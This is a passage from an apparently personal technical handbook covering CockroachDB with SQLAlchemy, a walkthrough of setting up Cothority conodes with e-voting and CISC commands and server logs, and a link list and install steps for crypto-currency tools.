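CockroachDB can generate a starting HAProxy config for an existing cluster; a sketch (the node address and certs directory are placeholders):

# run from a machine that can reach the cluster
$ cockroach gen haproxy --certs-dir=certs --host=<address of any node>
# start HAProxy with the generated haproxy.cfg
$ haproxy -f haproxy.cfg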

10.1.8 Adapting SQLAlchemy to CockroachDB

CockroachDB is similar enough to PostgreSQL that SQLAlchemy’s built-in PostgreSQL dialect gets us most of the way there, but we still need a few tweaks that can be found in our cockroachdb python package.

https://www.cockroachlabs.com/blog/building-application-cockroachdb-sqlalchemy-2/
https://www.cockroachlabs.com/docs/stable/build-a-python-app-with-cockroachdb-sqlalchemy.html

SqlAlchemy Best Practice
https://www.cockroachlabs.com/docs/stable/build-a-python-app-with-cockroachdb-sqlalchemy.html#best-practices
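A minimal sketch of the SQLAlchemy side (the dialect package name, connection URL and sslmode are assumptions; adjust to your cluster and package version):

$ pip install sqlalchemy-cockroachdb psycopg2-binary
$ python -c "
import sqlalchemy
# the cockroachdb:// URL scheme is provided by the CockroachDB dialect package
engine = sqlalchemy.create_engine('cockroachdb://root@localhost:26257/defaultdb?sslmode=disable')
with engine.connect() as conn:
    print(conn.execute(sqlalchemy.text('SELECT version()')).fetchone())
"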

CHAPTER 11

Cothority

Contents:

11.1 Tips

11.1.1 Install

Setting up Conode on each of the servers:

Servers:
• 192.168.0.180
• 192.168.0.181
• 192.168.0.182

$ docker run -it --rm -p 6879-6880:6879-6880 --name conode -v ~/conode_data:/conode_data dedis/conode:latest ./conode setup

Output:

Setting up a cothority-server.

Please enter the [address:]PORT for incoming requests [6879]: 192.168.0.180:6879

We now need to get a reachable address for other Servers and clients to contact you.
This address will be put in a group definition file that you can share and combine
with others to form a Cothority roster.
Creating private and public keys for suite Ed25519.
Public key: b097aca656644fc86eaade5f3e14d74a922e7d5e4d0e2f1a05d7a2750edfde02

Give a description of the cothority [New cothority]: cothority-1

Please enter a folder for the configuration files [/root/.config/conode]:
Success! You can now use the conode with the config file /root/.config/conode/private.toml
Saved a group definition snippet for your server at /root/.config/conode/public.toml

[[servers]]
Address = "tls://192.168.0.180:6879"
Suite = "Ed25519"
Public = "b097aca656644fc86eaade5f3e14d74a922e7d5e4d0e2f1a05d7a2750edfde02"
Description = "New cothority"

All configurations saved, ready to serve signatures now.

Check conode_data created directory:

$ ls ~/conode_data/
private.toml  public.toml

$ cat ~/conode_data/public.toml
[[servers]]
Address = "tls://192.168.0.180:6879"
Suite = "Ed25519"
Public = "b097aca656644fc86eaade5f3e14d74a922e7d5e4d0e2f1a05d7a2750edfde02"
Description = "cothority-1"

Starting Conode:

$ docker run --rm -p 6879-6880:6879-6880 --name conode -v ~/conode_data:/conode_data dedis/conode:latest

Output:

3:( onet.newServiceManager: 241) - Starting service ftCoSiService 3:( onet.newServiceManager: 253) - Started Service ftCoSiService 3:( onet.newServiceManager: 241) - Starting service Status 3:( onet.newServiceManager: 253) - Started Service Status 3:( onet.newServiceManager: 241) - Starting service Skipchain 3:( messaging.NewPropagationFunc: 103) - Registering new propagation for

˓→tls://192.168.0.180:6879 SkipchainPropagate 357a62ee-c495-365b-9aed-e781d5a8285e 3:( onet.newServiceManager: 253) - Started Service Skipchain 3:( onet.newServiceManager: 241) - Starting service PoPServer 3:( messaging.NewPropagationFunc: 103) - Registering new propagation for

˓→tls://192.168.0.180:6879 PoPPropagateFinal 251a9e2d-b3a4-3a25-ac5b-e6b89d265be9 3:( messaging.NewPropagationFunc: 103) - Registering new propagation for

˓→tls://192.168.0.180:6879 PoPPropagateDescription 2144ba19-9d1e-33a0-9353-

˓→c2940af373eb 3:( onet.newServiceManager: 253) - Started Service PoPServer 3:( onet.newServiceManager: 241) - Starting service Identity 3:( messaging.NewPropagationFunc: 103) - Registering new propagation for

˓→tls://192.168.0.180:6879 IdentityPropagateID 7b7a50c0-7c42-3465-8fd7-42b5111c6e46 3:( messaging.NewPropagationFunc: 103) - Registering new propagation for

˓→tls://192.168.0.180:6879 IdentityPropagateSB 6b35d1a9-5f89-39b7-bc64-d39424dad041 3:( messaging.NewPropagationFunc: 103) - Registering new propagation for

˓→tls://192.168.0.180:6879 IdentityPropagateConf 816f3244-bae7-38ca-a916-7dca0c635d6a 3:( identity.( *Service).tryLoad: 795) - Successfully loaded 3:( onet.newServiceManager: 253) - Started Service Identity 3:( onet.newServiceManager: 241) - Starting service evoting 1:( service.new: 659) - Pin:

˓→f810aac19b690830d3e0c79a6c00a279 (continues on next page)


(continued from previous page) 3:( onet.newServiceManager: 253) - Started Service evoting 3:( onet.newServiceManager: 257) - tls://192.168.0.180:6879

˓→instantiated all services 1:( onet.( *Server).Start: 203) - Starting server at 2019-02-04 ˓→07:53:05 on address tls://192.168.0.180:6879 with public key

˓→b097aca656644fc86eaade5f3e14d74a922e7d5e4d0e2f1a05d7a2750edfde02 2:( onet.( *WebSocket).start: 93) - Starting to listen on0.0.0. ˓→0:6880 https://github.com/dedis/cothority/blob/master/conode/Docker.md#docker

11.1.2 Apps

Status of conodes

Copy the public.toml file from the servers to wherever you want to run the status command:

$ scp [email protected]:~/conode_data/public.toml ct1_public.toml
$ scp [email protected]:~/conode_data/public.toml ct2_public.toml
$ scp [email protected]:~/conode_data/public.toml ct3_public.toml
$ cat ct1_public.toml ct2_public.toml ct3_public.toml > public.toml
$ cat public.toml

[[servers]]
Address = "tls://192.168.0.180:6879"
Suite = "Ed25519"
Public = "b097aca656644fc86eaade5f3e14d74a922e7d5e4d0e2f1a05d7a2750edfde02"
Description = "cothority-1"
[[servers]]
Address = "tls://192.168.0.181:6879"
Suite = "Ed25519"
Public = "7a6e03ba71bd87aa1a62972eb20788ab21250ea23ad3166e995225278b227983"
Description = "cothority-2"
[[servers]]
Address = "tls://192.168.0.182:6879"
Suite = "Ed25519"
Public = "2c84becca826a737560d572ce1f4e4bbda47f32044611e660dcf5b27cf2c30c2"
Description = "cothority-3"

To get the status of the conodes in the cothority:

$ go get github.com/dedis/cothority/status

# @note: You can use `DEDIS_GROUP` env and set path of `public.toml` and run `status` cmd like this:
$ export DEDIS_GROUP=public.toml
$ ~/go/bin/status --group $DEDIS_GROUP

# @note: And also you can change the name of `public.toml` to `group.toml` and run `status` cmd like this:
$ ~/go/bin/status

Output:

Db.FreeAlloc: 8192 Db.FreePageN:0 (continues on next page)


(continued from previous page) Db.FreelistInuse: 32 Db.Open: true Db.OpenTxN:0 Db.PendingPageN:2 Db.Tx.CursorCount: 32 Db.Tx.NodeCount:7 Db.Tx.NodeDeref:0 Db.Tx.PageAlloc: 57344 Db.Tx.PageCount: 14 Db.Tx.Rebalance:0 Db.Tx.RebalanceTime: 0s Db.Tx.Spill:7 Db.Tx.SpillTime: 68.734µs Db.Tx.Split:0 Db.Tx.Write: 21 Db.Tx.WriteTime: 13.224429ms Db.TxN: 14 Generic.Available_Services: Identity,PoPServer,Skipchain,Status,evoting,ftCoSiService Generic.ConnType: tls Generic.Description: cothority-1 Generic.GoModuleInfo: Generic.GoRelease: go1.10.1 Generic.Host: 192.168.0.180 Generic.Port: 6879 Generic.RX_bytes: 1322 Generic.System: linux/amd64/go1.10.1 Generic.TX_bytes: 2095 Generic.Uptime: 2h32m46.804728179s Generic.Version:2.0 Skipblock.Blocks:0 Skipblock.Bytes:0 Db.FreeAlloc: 8192 Db.FreePageN:0 Db.FreelistInuse: 32 Db.Open: true Db.OpenTxN:0 Db.PendingPageN:2 Db.Tx.CursorCount: 27 Db.Tx.NodeCount:7 Db.Tx.NodeDeref:0 Db.Tx.PageAlloc: 57344 Db.Tx.PageCount: 14 Db.Tx.Rebalance:0 Db.Tx.RebalanceTime: 0s Db.Tx.Spill:7 Db.Tx.SpillTime: 22.611µs Db.Tx.Split:0 Db.Tx.Write: 21 Db.Tx.WriteTime: 14.09274ms Db.TxN:9 Generic.Available_Services: Identity,PoPServer,Skipchain,Status,evoting,ftCoSiService Generic.ConnType: tls Generic.Description: cothority-2 Generic.GoModuleInfo: Generic.GoRelease: go1.10.1 Generic.Host: 192.168.0.181 Generic.Port: 6879 (continues on next page)


(continued from previous page) Generic.RX_bytes: 2095 Generic.System: linux/amd64/go1.10.1 Generic.TX_bytes: 1322 Generic.Uptime: 1h50m37.783106977s Generic.Version:2.0 Skipblock.Blocks:0 Skipblock.Bytes:0 Db.FreeAlloc: 8192 Db.FreePageN:0 Db.FreelistInuse: 32 Db.Open: true Db.OpenTxN:0 Db.PendingPageN:2 Db.Tx.CursorCount: 24 Db.Tx.NodeCount:7 Db.Tx.NodeDeref:0 Db.Tx.PageAlloc: 57344 Db.Tx.PageCount: 14 Db.Tx.Rebalance:0 Db.Tx.RebalanceTime: 0s Db.Tx.Spill:7 Db.Tx.SpillTime: 24.517µs Db.Tx.Split:0 Db.Tx.Write: 21 Db.Tx.WriteTime: 14.166472ms Db.TxN:6 Generic.Available_Services: Identity,PoPServer,Skipchain,Status,evoting,ftCoSiService Generic.ConnType: tls Generic.Description: cothority-3 Generic.GoModuleInfo: Generic.GoRelease: go1.10.1 Generic.Host: 192.168.0.182 Generic.Port: 6879 Generic.RX_bytes:0 Generic.System: linux/amd64/go1.10.1 Generic.TX_bytes:0 Generic.Uptime: 2m26.909041005s Generic.Version:2.0 Skipblock.Blocks:0 Skipblock.Bytes:0 https://github.com/dedis/cothority#status https://github.com/dedis/cothority/blob/master/status/README.md

Collective Signing

$ go get github.com/dedis/cothority/ftcosi
$ date > /tmp/my_file

# @note: You can change the name of `group.toml` to `public.toml`! and run `ftcosi` cmd like this:
$ ~/go/bin/ftcosi sign /tmp/my_file | tee sig.json

# @note: And also you can use `DEDIS_GROUP` env and set path of `public.toml` and run `ftcosi` cmd like this:
$ export DEDIS_GROUP=group.toml
$ ~/go/bin/ftcosi sign --group $DEDIS_GROUP /tmp/my_file | tee sig.json


Output:

{ "Hash": "f28d7749dfd8dc2275345a134995e4b432fe051e56d1d2cac2d346cf475c5e52", "Signature":

˓→"ec4ccdb41c2c37caad5a26a0e575bff9aefea7f6993e3a47dc30ca8e888d73d9eb24289227e6cc9d699be407791da2e57ded947930ba4586baee3143918fc00203

˓→" }

Verify:

$ ~/go/bin/ftcosi verify --group $DEDIS_GROUP --signature sig.json /tmp/my_file

[+] OK: Signature is valid.

https://github.com/dedis/cothority#collective-signing

Evoting

$ go get github.com/dedis/cothority/evoting/evoting-admin/
$ cd $GOPATH/src/github.com/dedis/cothority/evoting/evoting-admin/ && go build -o $GOPATH/bin/evoting ./...

$ ~/go/bin/evoting-admin --help

-admins string    list of admin users
-id string        ID of the master chain to modify (optional)
-key string       public key of authentication server
-pin string       service pin
-roster string    path to roster toml file
-show             Show the current Master config
-sig string       A signature proving that you can login to Tequila with the given SCIPER.

Make a new master chain:

$ cp public.toml roster.toml
$ evoting-admin -roster roster.toml -pin f810aac19b690830d3e0c79a6c00a279 -admins 0,1,2,3

I : (main.main: 83) - Auth-server private key: 4fba8025c5ba783fe30bdb2bab653307a1fa23e29f9f42fe9fbaca93dbf05d09
I : (main.main: 114) - Auth-server public key: 87e1df80e37bd624c3a0a5852f28cf97d0705017c5da0bb7b0a047137db5d6ed
I : (main.main: 115) - Master ID: cf5f2f9bc05fc115e4d2ef869405a3e0841dff80bc8b36183f5f9d4142470b0c

Output of 192.168.0.180 conode server:


2:( onet.wsHandler.ServeHTTP: 178) - ws request from 192.168.0.

˓→107:36154: evoting/Link 2:( skipchain.( *Service).StoreSkipBlock: 177) - Creating new skipchain with ˓→roster[tls://192.168.0.180:6879 tls://192.168.0.181:6879 tls://192.168.0.182:6879] 3:( skipchain.( *Service).StoreSkipBlock: 349) - Propagate1 blocks 3:( skipchain.( *Service).startPropagation: 1145) - Starting to propagate for ˓→service tls://192.168.0.180:6879 3:( messaging.NewPropagationFunc.func2: 114) - tls://192.168.0.181:6879 ˓→Starting to propagate *skipchain.PropagateSkipBlocks 3:(onet.( *TreeNodeInstance).dispatchMsgReader: 455) - Starting node tls://192.168.0. ˓→180:6879(c687bde8-b612-577b-bc3c-dfb982382b64): SkipchainPropagate 3:( network.( *Router).connect: 204) - tls://[::]:6879 Connecting to ˓→tls://192.168.0.180:6879 2:( network.NewTLSConn: 369) - NewTLSConn to: tls://192.168.0.

˓→180:6879 2:(network.NewTLSListenerWithListenAddr.func1: 243) - Got new connection request

˓→from: 172.17.0.1:37406 3:( network.makeVerifier.func1.1: 276) - verify cert ->

˓→b097aca656644fc86eaade5f3e14d74a922e7d5e4d0e2f1a05d7a2750edfde02 3:( network.makeVerifier.func1.1: 276) - verify cert ->

˓→b097aca656644fc86eaade5f3e14d74a922e7d5e4d0e2f1a05d7a2750edfde02 3:( network.( *Router).connect: 210) - tls://[::]:6879 Connected to ˓→tls://192.168.0.180:6879 3:( network.( *Router).handleConn: 273) - tls://[::]:6879 Handling new ˓→connection from tls://192.168.0.180:6879 3:( network.( *Router).handleConn: 273) - tls://[::]:6879 Handling new ˓→connection from tls://192.168.0.180:6879 3:( messaging.( *Propagate).Dispatch: 165) - tls://192.168.0.180:6879 Got ˓→data from tls://192.168.0.180:6879 and setting timeout to 15s 3:( messaging.( *Propagate).Dispatch: 182) - tls://192.168.0.180:6879 ˓→Sending to children 3:( network.( *Router).connect: 204) - tls://[::]:6879 Connecting to ˓→tls://192.168.0.181:6879 2:( network.NewTLSConn: 369) - NewTLSConn to: tls://192.168.0.

˓→181:6879 3:( network.( *Router).connect: 204) - tls://[::]:6879 Connecting to ˓→tls://192.168.0.182:6879 2:( network.NewTLSConn: 369) - NewTLSConn to: tls://192.168.0.

˓→182:6879 3:( network.makeVerifier.func1.1: 276) - verify cert ->

˓→2c84becca826a737560d572ce1f4e4bbda47f32044611e660dcf5b27cf2c30c2 3:( network.makeVerifier.func1.1: 276) - verify cert ->

˓→7a6e03ba71bd87aa1a62972eb20788ab21250ea23ad3166e995225278b227983 3:( network.( *Router).connect: 210) - tls://[::]:6879 Connected to ˓→tls://192.168.0.182:6879 3:( network.( *Router).handleConn: 273) - tls://[::]:6879 Handling new ˓→connection from tls://192.168.0.182:6879 3:( network.( *Router).connect: 210) - tls://[::]:6879 Connected to ˓→tls://192.168.0.181:6879 3:( network.( *Router).handleConn: 273) - tls://[::]:6879 Handling new ˓→connection from tls://192.168.0.181:6879 3:( messaging.( *Propagate).Dispatch: 215) - tls://192.168.0.180:6879 done, ˓→isroot: true 3:( onet.( *TreeNodeInstance).Done: 571) - tls://192.168.0.180:6879 ˓→(c687bde8-b612-577b-bc3c-dfb982382b64): SkipchainPropagate has finished. Deleting

˓→its resources 3:( onet.( *TreeNodeInstance).closeDispatch: 328) - Closing node tls://192.168.0. ˓→180:6879(c687bde8-b612-577b-bc3c-dfb982382b64): SkipchainPropagate (continues on next page)


(continued from previous page) 3:( messaging.propagateStartAndWait: 142) - Finished propagation with3

˓→replies 3:( skipchain.( *Service).StoreSkipBlock: 359) - Block added, replying. New ˓→latest is: cf5f2f9bc05fc115e4d2ef869405a3e0841dff80bc8b36183f5f9d4142470b0c, at

˓→index0 3:(onet.( *TreeNodeInstance).dispatchMsgReader: 459) - Closing reader 2:( skipchain.( *Service).StoreSkipBlock: 206) - Adding block with roster[tls:// ˓→192.168.0.180:6879 tls://192.168.0.181:6879 tls://192.168.0.182:6879] to

˓→cf5f2f9bc05fc115e4d2ef869405a3e0841dff80bc8b36183f5f9d4142470b0c 3:( skipchain.( *Service).StoreSkipBlock: 315) - Checking if all nodes from ˓→roster accept block 3:(onet.( *TreeNodeInstance).RegisterHandler: 295) - Registered handler ˓→PTID(skipchain.ProtoExtendRoster:a8a68b7b918356b69ce0333776a166b0) with flags0 3:(onet.( *TreeNodeInstance).RegisterHandler: 295) - Registered handler ˓→PTID(skipchain.ProtoExtendRosterReply:bb6cd0d0ac0b5a5c84a5279f0fc266a6) with flags0 3:( skipchain.( *ExtendRoster).Start: 90) - Starting Protocol ExtendRoster 3:(onet.( *TreeNodeInstance).dispatchMsgReader: 455) - Starting node tls://192.168.0. ˓→180:6879(d157abe9-6533-5490-a32a-8d206d8469d1): scExtendRoster 3:( onet.( *TreeNodeInstance).Done: 571) - tls://192.168.0.180:6879 ˓→(d157abe9-6533-5490-a32a-8d206d8469d1): scExtendRoster has finished. Deleting its

˓→resources 3:( onet.( *TreeNodeInstance).closeDispatch: 328) - Closing node tls://192.168.0. ˓→180:6879(d157abe9-6533-5490-a32a-8d206d8469d1): scExtendRoster 3:(onet.( *TreeNodeInstance).dispatchMsgReader: 459) - Closing reader 3:( skipchain.( *Service).forwardLinkLevel0: 825) - tls://192.168.0.180:6879 is ˓→adding forward-link to[tls://192.168.0.180:6879 tls://192.168.0.181:6879 tls://192.

˓→168.0.182:6879]:0->1 3:( byzcoinx.( *ByzCoinX).Start: 77) - Starting prepare phase 3:( protocol.( *FtCosi).Start: 332) - Starting CoSi 3:(onet.( *TreeNodeInstance).dispatchMsgReader: 455) - Starting node tls://192.168.0. ˓→180:6879(d629e4fc-b3db-5a96-85f9-37d7fb49cd49): SkipchainBFTNew 3:( protocol.( *FtCosi).Dispatch: 120) - leader protocol started 3:(onet.( *TreeNodeInstance).RegisterHandler: 295) - Registered handler ˓→PTID(protocol.Stop:9d8b4bf59a8a5ea79bfda30dbb7e4be8) with flags0 3:( protocol.( *SubFtCosi).Start: 277) - tls://192.168.0.180:6879 ˓→Starting subCoSi 3:( protocol.( *FtCosi).Dispatch: 148) - tls://192.168.0.180:6879 all ˓→protocols started 3:( protocol.( *FtCosi).Dispatch.func1: 124) - tls://192.168.0.180:6879 ˓→starting verification 3:(onet.( *TreeNodeInstance).dispatchMsgReader: 455) - Starting node tls://192.168.0. ˓→180:6879(eee01075-292f-5128-8bb0-c1b54565e9ae): SkipchainBFTNew_subcosi_prep 3:( protocol.( *SubFtCosi).Dispatch: 105) - tls://192.168.0.180:6879 ˓→received announcement 3:(onet.( *TreeNodeInstance).dispatchMsgReader: 455) - Starting node tls://192.168.0. ˓→180:6879(26104825-e456-5c14-9d7c-91c42903402a): SkipchainBFTNew_cosi_prep 3:( protocol.( *SubFtCosi).Dispatch: 167) - tls://192.168.0.180:6879 ˓→finished receiving commitments,1 commitment(s) received 3:( protocol.( *FtCosi).Dispatch: 164) - root-node generating global ˓→challenge 3:( protocol.( *SubFtCosi).Dispatch: 220) - tls://192.168.0.180:6879 ˓→received challenge 3:( protocol.( *SubFtCosi).Dispatch: 238) - tls://192.168.0.180:6879 ˓→received all1 response(s) 3:( onet.( *TreeNodeInstance).Done: 571) - tls://192.168.0.180:6879 ˓→(eee01075-292f-5128-8bb0-c1b54565e9ae): SkipchainBFTNew_subcosi_prep has finished.

˓→Deleting its resources (continues on next page)


(continued from previous page) 3:( onet.( *TreeNodeInstance).closeDispatch: 328) - Closing node tls://192.168.0. ˓→180:6879(eee01075-292f-5128-8bb0-c1b54565e9ae): SkipchainBFTNew_subcosi_prep 3:(onet.( *TreeNodeInstance).dispatchMsgReader: 459) - Closing reader 3:( protocol.generateResponse: 111) - tls://192.168.0.180:6879

˓→Verification successful 3:( protocol.generateResponse: 120) - tls://192.168.0.180:6879 is

˓→done aggregating responses with total of2 responses 3:( protocol.( *FtCosi).Dispatch: 218) - tls://192.168.0.180:6879 starts ˓→final signature 3:( protocol.( *FtCosi).Dispatch: 226) - Root-node is done without errors 3:( onet.( *TreeNodeInstance).Done: 571) - tls://192.168.0.180:6879 ˓→(26104825-e456-5c14-9d7c-91c42903402a): SkipchainBFTNew_cosi_prep has finished.

˓→Deleting its resources 3:( onet.( *TreeNodeInstance).closeDispatch: 328) - Closing node tls://192.168.0. ˓→180:6879(26104825-e456-5c14-9d7c-91c42903402a): SkipchainBFTNew_cosi_prep 3:(onet.( *TreeNodeInstance).dispatchMsgReader: 459) - Closing reader 3:( byzcoinx.( *ByzCoinX).Dispatch: 149) - Finished prepare phase 3:( byzcoinx.( *ByzCoinX).Dispatch: 152) - Starting commit phase 3:( protocol.( *FtCosi).Start: 332) - Starting CoSi 3:( protocol.( *FtCosi).Dispatch: 120) - leader protocol started 3:(onet.( *TreeNodeInstance).dispatchMsgReader: 455) - Starting node tls://192.168.0. ˓→180:6879(5af294ee-859a-5df6-8b6d-118f54741ede): SkipchainBFTNew_cosi_commit 3:( protocol.( *FtCosi).Dispatch.func1: 124) - tls://192.168.0.180:6879 ˓→starting verification 3:(onet.( *TreeNodeInstance).RegisterHandler: 295) - Registered handler ˓→PTID(protocol.Stop:9d8b4bf59a8a5ea79bfda30dbb7e4be8) with flags0 3:(onet.( *TreeNodeInstance).dispatchMsgReader: 455) - Starting node tls://192.168.0. ˓→180:6879(f7176736-e73e-579d-a837-c0f0e9578d9a): SkipchainBFTNew_subcosi_commit 3:( protocol.( *SubFtCosi).Start: 277) - tls://192.168.0.180:6879 ˓→Starting subCoSi 3:( protocol.( *FtCosi).Dispatch: 148) - tls://192.168.0.180:6879 all ˓→protocols started 3:( protocol.( *SubFtCosi).Dispatch: 105) - tls://192.168.0.180:6879 ˓→received announcement 3:( protocol.( *SubFtCosi).Dispatch: 167) - tls://192.168.0.180:6879 ˓→finished receiving commitments,1 commitment(s) received 3:( protocol.( *FtCosi).Dispatch: 164) - root-node generating global ˓→challenge 3:( protocol.( *SubFtCosi).Dispatch: 220) - tls://192.168.0.180:6879 ˓→received challenge 3:( protocol.( *SubFtCosi).Dispatch: 238) - tls://192.168.0.180:6879 ˓→received all1 response(s) 3:( onet.( *TreeNodeInstance).Done: 571) - tls://192.168.0.180:6879 ˓→(f7176736-e73e-579d-a837-c0f0e9578d9a): SkipchainBFTNew_subcosi_commit has finished.

˓→ Deleting its resources 3:( onet.( *TreeNodeInstance).closeDispatch: 328) - Closing node tls://192.168.0. ˓→180:6879(f7176736-e73e-579d-a837-c0f0e9578d9a): SkipchainBFTNew_subcosi_commit 3:(onet.( *TreeNodeInstance).dispatchMsgReader: 459) - Closing reader 3:( protocol.generateResponse: 111) - tls://192.168.0.180:6879

˓→Verification successful 3:( protocol.generateResponse: 120) - tls://192.168.0.180:6879 is

˓→done aggregating responses with total of2 responses 3:( protocol.( *FtCosi).Dispatch: 218) - tls://192.168.0.180:6879 starts ˓→final signature 3:( protocol.( *FtCosi).Dispatch: 226) - Root-node is done without errors 3:( onet.( *TreeNodeInstance).Done: 571) - tls://192.168.0.180:6879 ˓→(5af294ee-859a-5df6-8b6d-118f54741ede): SkipchainBFTNew_cosi_commit has finished.

˓→Deleting its resources (continues on next page)


(continued from previous page) 3:( onet.( *TreeNodeInstance).closeDispatch: 328) - Closing node tls://192.168.0. ˓→180:6879(5af294ee-859a-5df6-8b6d-118f54741ede): SkipchainBFTNew_cosi_commit 3:(onet.( *TreeNodeInstance).dispatchMsgReader: 459) - Closing reader 3:( byzcoinx.( *ByzCoinX).Dispatch: 166) - Finished commit phase 3:( onet.( *TreeNodeInstance).Done: 571) - tls://192.168.0.180:6879 ˓→(d629e4fc-b3db-5a96-85f9-37d7fb49cd49): SkipchainBFTNew has finished. Deleting its

˓→resources 3:( onet.( *TreeNodeInstance).closeDispatch: 328) - Closing node tls://192.168.0. ˓→180:6879(d629e4fc-b3db-5a96-85f9-37d7fb49cd49): SkipchainBFTNew 3:(onet.( *TreeNodeInstance).dispatchMsgReader: 459) - Closing reader 3:( skipchain.( *Service).forwardLinkLevel0: 845) - tls://192.168.0.180:6879 adds ˓→forward-link to[tls://192.168.0.180:6879 tls://192.168.0.181:6879 tls://192.168.0.

˓→182:6879]:0->1 - fwlinks:[] 3:( skipchain.( *Service).startPropagation: 1145) - Starting to propagate for ˓→service tls://192.168.0.180:6879 3:( messaging.NewPropagationFunc.func2: 114) - tls://192.168.0.180:6879 ˓→Starting to propagate *skipchain.PropagateSkipBlocks 3:(onet.( *TreeNodeInstance).dispatchMsgReader: 455) - Starting node tls://192.168.0. ˓→180:6879(099668f4-049f-5d59-b850-6227e076ccd9): SkipchainPropagate 3:( messaging.( *Propagate).Dispatch: 165) - tls://192.168.0.180:6879 Got ˓→data from tls://192.168.0.180:6879 and setting timeout to 15s 3:( messaging.( *Propagate).Dispatch: 182) - tls://192.168.0.180:6879 ˓→Sending to children 3:( messaging.( *Propagate).Dispatch: 215) - tls://192.168.0.180:6879 done, ˓→isroot: true 3:( onet.( *TreeNodeInstance).Done: 571) - tls://192.168.0.180:6879 ˓→(099668f4-049f-5d59-b850-6227e076ccd9): SkipchainPropagate has finished. Deleting

˓→its resources 3:( onet.( *TreeNodeInstance).closeDispatch: 328) - Closing node tls://192.168.0. ˓→180:6879(099668f4-049f-5d59-b850-6227e076ccd9): SkipchainPropagate 3:(onet.( *TreeNodeInstance).dispatchMsgReader: 459) - Closing reader 3:( messaging.propagateStartAndWait: 142) - Finished propagation with3

˓→replies 3:( skipchain.( *Service).StoreSkipBlock: 329) - Asking forward-links from all ˓→linked blocks 3:( skipchain.( *Service).StoreSkipBlock: 349) - Propagate2 blocks 3:( skipchain.( *Service).startPropagation: 1145) - Starting to propagate for ˓→service tls://192.168.0.180:6879 3:( messaging.NewPropagationFunc.func2: 114) - tls://192.168.0.181:6879 ˓→Starting to propagate *skipchain.PropagateSkipBlocks 3:(onet.( *TreeNodeInstance).dispatchMsgReader: 455) - Starting node tls://192.168.0. ˓→180:6879(c545a7d1-af42-518b-a7e9-4538384620cf): SkipchainPropagate 3:( messaging.( *Propagate).Dispatch: 165) - tls://192.168.0.180:6879 Got ˓→data from tls://192.168.0.180:6879 and setting timeout to 15s 3:( messaging.( *Propagate).Dispatch: 182) - tls://192.168.0.180:6879 ˓→Sending to children 3:( messaging.( *Propagate).Dispatch: 215) - tls://192.168.0.180:6879 done, ˓→isroot: true 3:( onet.( *TreeNodeInstance).Done: 571) - tls://192.168.0.180:6879 ˓→(c545a7d1-af42-518b-a7e9-4538384620cf): SkipchainPropagate has finished. Deleting

˓→its resources 3:( onet.( *TreeNodeInstance).closeDispatch: 328) - Closing node tls://192.168.0. ˓→180:6879(c545a7d1-af42-518b-a7e9-4538384620cf): SkipchainPropagate 3:(onet.( *TreeNodeInstance).dispatchMsgReader: 459) - Closing reader 3:( messaging.propagateStartAndWait: 142) - Finished propagation with3

˓→replies 3:( skipchain.( *Service).StoreSkipBlock: 359) - Block added, replying. New ˓→latest is: 84291836f8e62e7f4b619de39d724eb5546ebecf24392155627181df3d24ffcc,(continues onat next page)

˓→index1


(continued from previous page) https://github.com/dedis/cothority/blob/master/evoting/README.md https://github.com/dedis/cothority/tree/master/evoting/evoting-admin

CISC

$ cisc --help

link, ln        create and use links with admin privileges
skipchain, sc   work with the underlying skipchain
data, cfg       updating and voting on data
keyvalue, kv    storing and retrieving key/value pairs
ssh             interacting with the ssh-keys stored in the skipchain
follow, f       follow skipchains
web, w          add a web-site to a skipchain
cert, c         create and use links with admin privileges
help, h         Shows a list of commands or help for one command

Connecting to one conode:

$ cisc link pin 192.168.0.180:6879

Please read PIN in server-log

Output of 192.168.0.180 conode server:

2 : (onet.wsHandler.ServeHTTP: 178) - ws request from 192.168.0.107:37832: Identity/PinRequest
3 : (identity.(*Service).PinRequest: 117) - PinRequest tls://192.168.0.180:6879
I : (identity.(*Service).PinRequest: 121) - PIN: 494777
3 : (onet.wsHandler.ServeHTTP: 188) - Got an error while executing Identity/PinRequest: Read PIN in server-log

$ cisc link pin 192.168.0.180:6879 494777

Successfully linked with tcp://192.168.0.180:6879

$ ls ~/.cisc/
config.bin

Creating an identity:

$ cisc skipchain create group.toml

Found full link to conode: 192.168.0.180:6879 44251bc84a7fe20a2fe0064b4ff858a01a5c14a3d4196239ea5d29e8b5cde354
Creating new blockchain-identity for omid in roster [tls://192.168.0.180:6879 tls://192.168.0.181:6879 tls://192.168.0.182:6879]
New cisc-id is: c1d0e4ab9b91781101406687c8d72992039955b653dfdc037fbf5758ccbd2a8d

Storing a key/value pair


$ cisc keyvalue add name omid

Stored key-value pair

$ cisc keyvalue add family raha

Stored key-value pair

$ cisc keyvalue list

family: raha
name: omid

$ cisc keyvalue list c1d0e4ab9b91781101406687c8d72992039955b653dfdc037fbf5758ccbd2a8d

family: raha
name: omid

https://github.com/dedis/cothority/blob/master/cisc/CLI.md

CHAPTER 12

Crypto currency

Contents:

12.1 Tips

12.1.1 Create your own block chain https://www.walletbuilders.com/

12.1.2 Coins Analysis https://coincheckup.com/ http://cryptocoinviz.com/ https://coinmarketcap.com/ https://bittrex.com/home/markets https://www.coinspot.com.au/buy/nxt

12.1.3 Exchange coins https://hitbtc.com/exchange https://changelly.com/ https://www.aex.com/ https://shapeshift.io/#/coins


12.1.4 Buy/Sell coins https://www.litebit.eu/en/buy/nxt https://www.bitfinex.com/

12.1.5 Buy coins by Paypal https://www.cointal.com/ https://localbitcoins.com/ https://www.virwox.com/register.php https://www.lakebtc.com/register

12.1.6 Tools https://github.com/ccxt/ccxt https://github.com/AbenezerMamo/crypto-signal https://github.com/triestpa/Cryptocurrency-Analysis-Python http://chainquery.com/bitcoin-api/getdifficulty

12.1.7 Python

$ pip install ccxt
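A quick smoke test that the library is importable (just a sketch; the output depends on the installed ccxt version):

$ python -c "import ccxt; print(len(ccxt.exchanges), ccxt.exchanges[:5])"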

12.1.8 Bitcoin

Generate wallet https://liteaddress.org/ https://www.bitaddress.org/ https://tools.bitcoin.com/paper-wallet/ https://bitcoinpaperwallet.com/bitcoinpaperwallet/generate-wallet.html

12.1.9 Universal JavaScript Client-Side Wallet Generator https://github.com/walletgeneratornet/WalletGenerator.net https://walletgenerator.net/ https://walletgenerator.net/?currency=Zcash

Blockchain explorer https://blockchain.info/ https://blockexplorer.com/


12.1.10 NXT https://nxtplatform.org/get-started/for-you/

Install https://nxtwiki.org/wiki/How-To:InstallNRSLinux

$ wget https://bitbucket.org/Jelurida/nxt/downloads/nxt-client-1.11.10.zip
$ unzip nxt-client-1.11.10.zip
$ cd nxt
$ vim conf/nxt-default.properties
